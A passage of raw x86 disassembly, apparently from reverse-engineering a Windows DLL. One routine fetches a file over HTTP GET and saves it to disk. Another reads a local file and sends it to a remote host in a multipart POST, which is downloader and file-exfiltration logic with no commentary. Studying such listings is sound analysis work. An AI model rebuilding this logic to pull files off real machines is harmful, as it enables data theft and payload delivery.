call ds:lstrlenA ; lstrlenA
add eax, 0FFh
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpString1], eax
mov edx, [ebp+lpString2]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
add eax, 400h
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
push 2800h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Str], eax
mov eax, [ebp+lpString2]
push eax ; lpString2
mov ecx, [ebp+name]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
mov edx, [ebp+name]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_10005F8B
push 2Fh ; Val
mov eax, [ebp+name]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; lpString2
mov ecx, [ebp+lpString1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push 2Fh ; Val
mov edx, [ebp+name]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
loc_10005F8B: ; CODE XREF: sub_10005E66+F1�j
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
mov [ebp+type], 1
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 989680h
mov [ebp+var_4], 0
mov ecx, [ebp+name]
push ecx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jnz short loc_10005FE8
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_10005FE8: ; CODE XREF: sub_10005E66+174�j
push 10h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+var_3C]
movsx ecx, word ptr [eax+0Ah]
push ecx ; Size
mov edx, [ebp+var_3C]
mov eax, [edx+0Ch]
mov ecx, [eax]
push ecx ; Src
lea edx, [ebp+var_1C]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+var_3C]
mov cx, [eax+8]
mov [ebp+Dst], cx
mov dx, [ebp+hostshort]
push edx ; hostshort
call ds:htons ; htons
mov [ebp+var_1E], ax
push 0 ; protocol
mov eax, [ebp+type]
push eax ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0
jnb short loc_1000605E
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_1000605E: ; CODE XREF: sub_10005E66+1EA�j
push 10h ; namelen
lea ecx, [ebp+Dst]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10006082
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_10006082: ; CODE XREF: sub_10005E66+20E�j
mov eax, [ebp+name]
push eax
mov ecx, [ebp+lpString1]
push ecx
push offset aGetSHttp1_0Acc ; "GET %s HTTP/1.0\r\nAccept: */*\r\nHost: %s\r"...
mov edx, [ebp+Memory]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
cmp [ebp+Source], 0
jz short loc_100060B5
mov eax, [ebp+Source]
push eax ; Source
mov ecx, [ebp+Memory]
push ecx ; Dest
call strcat ; strcat
add esp, 8
loc_100060B5: ; CODE XREF: sub_10005E66+23D�j
push offset asc_10022A60 ; "\r\n"
mov edx, [ebp+Memory]
push edx ; Dest
call strcat ; strcat
add esp, 8
push 0 ; flags
mov eax, [ebp+Memory]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
mov ecx, [ebp+Memory]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+Size], eax
cmp [ebp+Size], 0FFFFFFFFh
jz short loc_100060FE
cmp [ebp+Size], 0
jnz short loc_1000610A
loc_100060FE: ; CODE XREF: sub_10005E66+28D�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_1000610A: ; CODE XREF: sub_10005E66+296�j
; sub_10005E66+323�j
mov [ebp+var_304], 0
jmp short loc_10006125
; ---------------------------------------------------------------------------
loc_10006116: ; CODE XREF: sub_10005E66:loc_1000614A�j
mov eax, [ebp+var_304]
add eax, 1
mov [ebp+var_304], eax
loc_10006125: ; CODE XREF: sub_10005E66+2AE�j
mov ecx, [ebp+var_304]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_1000614C
mov edx, [ebp+var_304]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_1000614A
jmp short loc_1000614C
; ---------------------------------------------------------------------------
loc_1000614A: ; CODE XREF: sub_10005E66+2E0�j
jmp short loc_10006116
; ---------------------------------------------------------------------------
loc_1000614C: ; CODE XREF: sub_10005E66+2CB�j
; sub_10005E66+2E2�j
mov ecx, [ebp+var_304]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_10006185
cmp [ebp+readfds.fd_count], 40h
jnb short loc_10006185
mov edx, [ebp+var_304]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_10006185: ; CODE XREF: sub_10005E66+2F2�j
; sub_10005E66+2FB�j
xor edx, edx
test edx, edx
jnz loc_1000610A
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
test eax, eax
jz loc_10006417
push 2800h ; Size
push 0 ; Val
mov edx, [ebp+Str]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; flags
push 2800h ; len
mov eax, [ebp+Str]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+Size], eax
loc_100061E5: ; CODE XREF: sub_10005E66:loc_10006385�j
cmp [ebp+Size], 0
jz loc_1000638A
cmp [ebp+Size], 0FFFFFFFFh
jnz short loc_10006207
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_10006207: ; CODE XREF: sub_10005E66+393�j
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK"
mov edx, [ebp+Str]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_100062FE
push offset asc_10022A74 ; "\r\n\r\n"
mov eax, [ebp+Str]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 4
mov [ebp+Src], eax
push offset aContentLength ; "Content-Length: "
mov ecx, [ebp+Str]
push ecx ; Str
call ds:strstr ; strstr
add esp, 8
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jbe short loc_1000628D
mov edx, [ebp+var_28]
add edx, 10h
mov [ebp+var_28], edx
push offset asc_10022A90 ; "\r\n"
mov eax, [ebp+var_28]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
mov byte ptr [eax], 0
mov ecx, [ebp+var_28]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+nNumberOfBytesToWrite], eax
jmp short loc_1000629E
; ---------------------------------------------------------------------------
loc_1000628D: ; CODE XREF: sub_10005E66+3F5�j
mov [ebp+nNumberOfBytesToWrite], 186A0h
mov [ebp+var_2F0], 1
loc_1000629E: ; CODE XREF: sub_10005E66+425�j
mov edx, [ebp+nNumberOfBytesToWrite]
add edx, 1
push edx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpBuffer], eax
mov eax, [ebp+nNumberOfBytesToWrite]
add eax, 1
push eax ; Size
push 0 ; Val
mov ecx, [ebp+lpBuffer]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
mov edx, [ebp+Src]
sub edx, [ebp+Str]
mov eax, [ebp+Size]
sub eax, edx
push eax ; Size
mov ecx, [ebp+Src]
push ecx ; Src
mov edx, [ebp+lpBuffer]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+Src]
sub eax, [ebp+Str]
mov ecx, [ebp+Size]
sub ecx, eax
mov [ebp+var_40], ecx
jmp short loc_10006339
; ---------------------------------------------------------------------------
loc_100062FE: ; CODE XREF: sub_10005E66+3B8�j
cmp [ebp+lpBuffer], 0
jnz short loc_10006310
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_10006310: ; CODE XREF: sub_10005E66+49C�j
mov edx, [ebp+Size]
push edx ; Size
mov eax, [ebp+Str]
push eax ; Src
mov ecx, [ebp+lpBuffer]
add ecx, [ebp+var_40]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov edx, [ebp+var_40]
add edx, [ebp+Size]
mov [ebp+var_40], edx
loc_10006339: ; CODE XREF: sub_10005E66+496�j
mov eax, [ebp+arg_10]
imul eax, 0F4240h
mov [ebp+timeout.tv_usec], eax
lea ecx, [ebp+timeout]
push ecx ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
push 0 ; nfds
call ds:select ; select
test eax, eax
jz short loc_10006383
push 0 ; flags
push 2800h ; len
mov eax, [ebp+Str]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+Size], eax
jmp short loc_10006385
; ---------------------------------------------------------------------------
loc_10006383: ; CODE XREF: sub_10005E66+4F8�j
jmp short loc_1000638A
; ---------------------------------------------------------------------------
loc_10006385: ; CODE XREF: sub_10005E66+51B�j
jmp loc_100061E5
; ---------------------------------------------------------------------------
loc_1000638A: ; CODE XREF: sub_10005E66+386�j
; sub_10005E66:loc_10006383�j
cmp [ebp+lpFileName], 0
jz loc_10006415
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
mov edx, [ebp+lpFileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+var_2F0], 0
jnz short loc_100063D3
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov ecx, [ebp+nNumberOfBytesToWrite]
push ecx ; nNumberOfBytesToWrite
mov edx, [ebp+lpBuffer]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
jmp short loc_1000640B
; ---------------------------------------------------------------------------
loc_100063D3: ; CODE XREF: sub_10005E66+551�j
mov [ebp+var_50], 0
loc_100063DA: ; CODE XREF: sub_10005E66+5A3�j
mov ecx, [ebp+lpBuffer]
add ecx, [ebp+var_50]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_1000640B
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 1 ; nNumberOfBytesToWrite
mov ecx, [ebp+lpBuffer]
add ecx, [ebp+var_50]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
mov eax, [ebp+var_50]
add eax, 1
mov [ebp+var_50], eax
jmp short loc_100063DA
; ---------------------------------------------------------------------------
loc_1000640B: ; CODE XREF: sub_10005E66+56B�j
; sub_10005E66+57F�j
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10006415: ; CODE XREF: sub_10005E66+528�j
jmp short loc_10006423
; ---------------------------------------------------------------------------
loc_10006417: ; CODE XREF: sub_10005E66+342�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006501
; ---------------------------------------------------------------------------
loc_10006423: ; CODE XREF: sub_10005E66:loc_10006415�j
jmp short loc_10006490
; ---------------------------------------------------------------------------
loc_10006425: ; DATA XREF: .rdata:stru_1001FDF0�o
cmp [ebp+s], 0
jz short loc_1000643B
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
loc_1000643B: ; CODE XREF: sub_10005E66+5C6�j
mov eax, [ebp+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+Str]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+name]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+lpString1]
push eax ; Memory
call ds:free ; free
add esp, 4
mov [ebp+var_308], 0
mov eax, offset loc_10006485
retn
; ---------------------------------------------------------------------------
loc_10006485: ; DATA XREF: sub_10005E66+619�o
mov eax, [ebp+var_308]
jmp loc_10006536
; ---------------------------------------------------------------------------
loc_10006490: ; CODE XREF: sub_10005E66:loc_10006423�j
mov [ebp+var_4], 0FFFFFFFFh
cmp [ebp+s], 0
jz short loc_100064AD
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
loc_100064AD: ; CODE XREF: sub_10005E66+638�j
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+Str]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+name]
push ecx ; Memory
call ds:free ; free
add esp, 4
mov edx, [ebp+lpString1]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+nNumberOfBytesToWrite]
cmp eax, [ebp+var_40]
jz short loc_100064F8
cmp [ebp+var_2F0], 0
jz short loc_100064FD
loc_100064F8: ; CODE XREF: sub_10005E66+687�j
mov eax, [ebp+lpBuffer]
jmp short loc_10006536
; ---------------------------------------------------------------------------
loc_100064FD: ; CODE XREF: sub_10005E66+690�j
xor eax, eax
jmp short loc_10006536
; ---------------------------------------------------------------------------
loc_10006501: ; CODE XREF: sub_10005E66+17D�j
; sub_10005E66+1F3�j ...
cmp [ebp+s], 0
jz short loc_10006517
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
loc_10006517: ; CODE XREF: sub_10005E66+6A2�j
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+Str]
push eax ; Memory
call ds:free ; free
add esp, 4
xor eax, eax
loc_10006536: ; CODE XREF: sub_10005E66+625�j
; sub_10005E66+695�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10005E66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; CODE XREF: sub_10009FE2+327�p
; sub_1000B7EF+E4B�p ...
var_528 = dword ptr -528h
var_524 = dword ptr -524h
FileName = byte ptr -520h
var_51F = byte ptr -51Fh
NumberOfBytesWritten= dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
s = dword ptr -414h
hostshort = word ptr -410h
var_40C = dword ptr -40Ch
name = byte ptr -408h
var_407 = byte ptr -407h
Source = dword ptr -3C8h
var_3C4 = dword ptr -3C4h
Dst = dword ptr -3C0h
readfds = fd_set ptr -3BCh
type = dword ptr -2B8h
WSAData = WSAData ptr -2B4h
var_124 = dword ptr -124h
timeout = timeval ptr -120h
var_118 = dword ptr -118h
Dest = byte ptr -114h
var_113 = byte ptr -113h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
hObject = dword ptr -8Ch
var_88 = byte ptr -88h
var_87 = byte ptr -87h
var_48 = dword ptr -48h
len = dword ptr -44h
Memory = dword ptr -40h
buf = dword ptr -3Ch
var_38 = dword ptr -38h
Str = dword ptr -34h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
lpFileName = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10006547
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 518h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov eax, [ebp+arg_0]
mov [ebp+Source], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+100h]
mov [ebp+Memory], edx
mov eax, [ebp+arg_0]
add eax, 108h
mov [ebp+lpFileName], eax
mov ecx, [ebp+arg_0]
add ecx, 207h
mov [ebp+var_28], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+308h]
mov [ebp+var_48], eax
mov [ebp+hostshort], 50h
mov ecx, [ebp+arg_0]
mov edx, [ecx+104h]
mov [ebp+var_40C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+30Ch]
mov [ebp+var_418], ecx
mov [ebp+s], 0
mov [ebp+name], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_407]
rep stosd
stosw
stosb
mov [ebp+var_88], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_87]
rep stosd
stosw
stosb
mov [ebp+Dest], 0
mov ecx, 1Fh
xor eax, eax
lea edi, [ebp+var_113]
rep stosd
stosw
stosb
push 0 ; Time
call ds:time ; time
add esp, 4
push eax ; Seed
call ds:srand ; srand
add esp, 4
mov [ebp+var_124], 0
jmp short loc_10006650
; ---------------------------------------------------------------------------
loc_10006641: ; CODE XREF: StartAddress+144�j
mov edx, [ebp+var_124]
add edx, 1
mov [ebp+var_124], edx
loc_10006650: ; CODE XREF: StartAddress+F8�j
cmp [ebp+var_124], 5
jge short loc_1000668D
push 200h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_124]
mov [ebp+ecx*4+buf], eax
push 200h ; Size
push 0 ; Val
mov edx, [ebp+var_124]
mov eax, [ebp+edx*4+buf]
push eax ; Dst
call memset ; memset
add esp, 0Ch
jmp short loc_10006641
; ---------------------------------------------------------------------------
loc_1000668D: ; CODE XREF: StartAddress+110�j
push 2800h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dst], eax
push 2800h ; Size
push 0 ; Val
mov ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 0Dh ; int
mov edx, off_10022114
push edx ; int
lea eax, [ebp+var_88]
push eax ; Dst
call sub_1000274A
add esp, 0Ch
lea ecx, [ebp+var_88]
push ecx
push offset aS ; "---------------------------%s"
lea edx, [ebp+Dest]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
mov eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+name]
push ecx ; Dest
call strcpy ; strcpy
add esp, 8
push 2Fh ; Val
lea edx, [ebp+name]
push edx ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
jz short loc_1000674E
push 2Fh ; Val
lea eax, [ebp+name]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
mov byte ptr [eax], 0
push 2Fh ; Val
mov ecx, [ebp+Source]
push ecx ; Str
call ds:strchr ; strchr
add esp, 8
push eax ; Source
lea edx, [ebp+var_88]
push edx ; Dest
call strcpy ; strcpy
add esp, 8
loc_1000674E: ; CODE XREF: StartAddress+1CE�j
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
mov [ebp+type], 1
mov [ebp+readfds.fd_count], 0
mov [ebp+timeout.tv_sec], 0
mov [ebp+timeout.tv_usec], 3938700h
mov [ebp+var_4], 0
lea ecx, [ebp+name]
push ecx ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_90], eax
cmp [ebp+var_90], 0
jnz short loc_100067B7
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_100067B7: ; CODE XREF: StartAddress+262�j
push 10h ; Size
push 0 ; Val
lea edx, [ebp+var_24]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+var_90]
movsx ecx, word ptr [eax+0Ah]
push ecx ; Size
mov edx, [ebp+var_90]
mov eax, [edx+0Ch]
mov ecx, [eax]
push ecx ; Src
lea edx, [ebp+var_20]
push edx ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, [ebp+var_90]
mov cx, [eax+8]
mov [ebp+var_24], cx
mov dx, [ebp+hostshort]
push edx ; hostshort
call ds:htons ; htons
mov [ebp+var_22], ax
push 0 ; protocol
mov eax, [ebp+type]
push eax ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0
jnb short loc_10006836
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006836: ; CODE XREF: StartAddress+2E1�j
; StartAddress+36E�j
mov [ebp+var_41C], 0
jmp short loc_10006851
; ---------------------------------------------------------------------------
loc_10006842: ; CODE XREF: StartAddress:loc_10006876�j
mov ecx, [ebp+var_41C]
add ecx, 1
mov [ebp+var_41C], ecx
loc_10006851: ; CODE XREF: StartAddress+2F9�j
mov edx, [ebp+var_41C]
cmp edx, [ebp+readfds.fd_count]
jnb short loc_10006878
mov eax, [ebp+var_41C]
mov ecx, [ebp+eax*4+readfds.fd_array]
cmp ecx, [ebp+s]
jnz short loc_10006876
jmp short loc_10006878
; ---------------------------------------------------------------------------
loc_10006876: ; CODE XREF: StartAddress+32B�j
jmp short loc_10006842
; ---------------------------------------------------------------------------
loc_10006878: ; CODE XREF: StartAddress+316�j
; StartAddress+32D�j
mov edx, [ebp+var_41C]
cmp edx, [ebp+readfds.fd_count]
jnz short loc_100068B1
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100068B1
mov eax, [ebp+var_41C]
mov ecx, [ebp+s]
mov [ebp+eax*4+readfds.fd_array], ecx
mov edx, [ebp+readfds.fd_count]
add edx, 1
mov [ebp+readfds.fd_count], edx
loc_100068B1: ; CODE XREF: StartAddress+33D�j
; StartAddress+346�j
xor eax, eax
test eax, eax
jnz loc_10006836
push 10h ; namelen
lea ecx, [ebp+var_24]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_100068DF
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_100068DF: ; CODE XREF: StartAddress+38A�j
mov eax, [ebp+var_28]
push eax
lea ecx, [ebp+Dest]
push ecx
push offset aSContentDispos ; "--%s\r\nContent-Disposition: form-data; n"...
mov edx, [ebp+var_38]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
push offset aS_0 ; "\r\n--%s--\r\n"
mov ecx, [ebp+Str]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
mov edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
mov esi, eax
mov eax, [ebp+var_38]
push eax ; Str
call strlen ; strlen
add esp, 4
add eax, esi
mov [ebp+var_94], eax
cmp [ebp+Memory], 0
jnz short loc_10006998
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 7 ; dwShareMode
push 80000000h ; dwDesiredAccess
mov ecx, [ebp+lpFileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_10006984
push 0 ; lpFileSizeHigh
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileSize ; GetFileSize
mov ecx, [ebp+var_94]
add ecx, eax
mov [ebp+var_94], ecx
jmp short loc_10006996
; ---------------------------------------------------------------------------
loc_10006984: ; CODE XREF: StartAddress+41C�j
mov edx, [ebp+var_94]
add edx, [ebp+var_40C]
mov [ebp+var_94], edx
loc_10006996: ; CODE XREF: StartAddress+43B�j
jmp short loc_100069AA
; ---------------------------------------------------------------------------
loc_10006998: ; CODE XREF: StartAddress+3F4�j
mov eax, [ebp+var_94]
add eax, [ebp+var_40C]
mov [ebp+var_94], eax
loc_100069AA: ; CODE XREF: StartAddress:loc_10006996�j
mov ecx, [ebp+var_94]
push ecx
lea edx, [ebp+name]
push edx
lea eax, [ebp+Dest]
push eax
lea ecx, [ebp+var_88]
push ecx
push offset aPostSHttp1_1Ac ; "POST %s HTTP/1.1\r\nAccept: */*\r\nContent-"...
mov edx, [ebp+buf]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 18h
push 0 ; flags
mov eax, [ebp+buf]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
mov ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006A10
cmp [ebp+var_3C4], 0
jnz short loc_10006A1C
loc_10006A10: ; CODE XREF: StartAddress+4BE�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006A1C: ; CODE XREF: StartAddress+4C7�j
push 0 ; flags
mov eax, [ebp+var_38]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
mov ecx, [ebp+var_38]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006A54
cmp [ebp+var_3C4], 0
jnz short loc_10006A60
loc_10006A54: ; CODE XREF: StartAddress+502�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006A60: ; CODE XREF: StartAddress+50B�j
cmp [ebp+Memory], 0
jnz loc_10006AF8
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_10006AF8
mov [ebp+len], 1
loc_10006A7E: ; CODE XREF: StartAddress:loc_10006AE7�j
cmp [ebp+len], 0
jz short loc_10006AE9
push 0 ; lpOverlapped
lea eax, [ebp+len]
push eax ; lpNumberOfBytesRead
push 2800h ; nNumberOfBytesToRead
mov ecx, [ebp+Dst]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
cmp [ebp+len], 0
jbe short loc_10006AE7
push 0 ; flags
mov eax, [ebp+len]
push eax ; len
mov ecx, [ebp+Dst]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006ADB
cmp [ebp+var_3C4], 0
jnz short loc_10006AE7
loc_10006ADB: ; CODE XREF: StartAddress+589�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006AE7: ; CODE XREF: StartAddress+560�j
; StartAddress+592�j
jmp short loc_10006A7E
; ---------------------------------------------------------------------------
loc_10006AE9: ; CODE XREF: StartAddress+53B�j
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_10006B5C
; ---------------------------------------------------------------------------
loc_10006AF8: ; CODE XREF: StartAddress+51D�j
; StartAddress+52A�j
mov [ebp+len], 0
loc_10006AFF: ; CODE XREF: StartAddress:loc_10006B5A�j
mov ecx, [ebp+len]
cmp ecx, [ebp+var_40C]
jnb short loc_10006B5C
push 0 ; flags
mov edx, [ebp+var_40C]
sub edx, [ebp+len]
push edx ; len
mov eax, [ebp+Memory]
add eax, [ebp+len]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
mov [ebp+var_3C4], eax
mov edx, [ebp+len]
add edx, [ebp+var_3C4]
mov [ebp+len], edx
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006B4E
cmp [ebp+var_3C4], 0
jnz short loc_10006B5A
loc_10006B4E: ; CODE XREF: StartAddress+5FC�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006B5A: ; CODE XREF: StartAddress+605�j
jmp short loc_10006AFF
; ---------------------------------------------------------------------------
loc_10006B5C: ; CODE XREF: StartAddress+5AF�j
; StartAddress+5C1�j
push 0 ; flags
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
mov ecx, [ebp+Str]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006B94
cmp [ebp+var_3C4], 0
jnz short loc_10006BA0
loc_10006B94: ; CODE XREF: StartAddress+642�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006BA0: ; CODE XREF: StartAddress+64B�j
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
test eax, eax
jz loc_10006D95
push 2800h ; Size
push 0 ; Val
mov edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; flags
push 2800h ; len
mov eax, [ebp+Dst]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0FFFFFFFFh
jz short loc_10006C0B
cmp [ebp+var_3C4], 0
jnz short loc_10006C17
loc_10006C0B: ; CODE XREF: StartAddress+6B9�j
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_10006F1D
; ---------------------------------------------------------------------------
loc_10006C17: ; CODE XREF: StartAddress+6C2�j
push offset asc_10022BF8 ; "\r\n\r\n"
mov edx, [ebp+Dst]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_10006D87
push 7Ch ; Val
mov eax, [ebp+Dst]
push eax ; Str
call ds:strchr ; strchr
add esp, 8
test eax, eax
